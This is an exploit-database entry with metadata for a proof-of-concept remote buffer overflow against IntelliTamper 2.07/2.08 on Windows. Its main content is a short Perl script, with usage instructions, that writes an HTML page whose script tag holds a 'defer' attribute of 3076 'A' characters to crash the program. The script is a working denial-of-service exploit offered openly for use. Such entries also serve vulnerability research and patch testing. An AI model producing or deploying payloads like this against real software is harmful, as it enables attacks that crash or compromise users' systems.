IntelliTamper 2.07/2.08 - Defer Remote Buffer Overflow (PoC)

Author: SkuLL-HackeR
type: dos
platform: windows
port: 
date_added: 2010-01-20  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comintellitamper_v2.07.exe  

raw file: 11217.txt  
# H0m3 : S3curity-art.com & Google.com
# M4!L : Wizard-skh@hotmail.com<mailto:Wizard-skh@hotmail.com> & My@hotmail.it<mailto:My@hotmail.it>
# usage : perl xpl.pl >>xpl.html
my $IntelliTamper_html ='<html><head><title>SkuLL-HackeR Home
World</title></head><body>' .
'<script defer="' .
"\x41" x 3076 .
'">' .
"</body></html>";
print $IntelliTamper_html;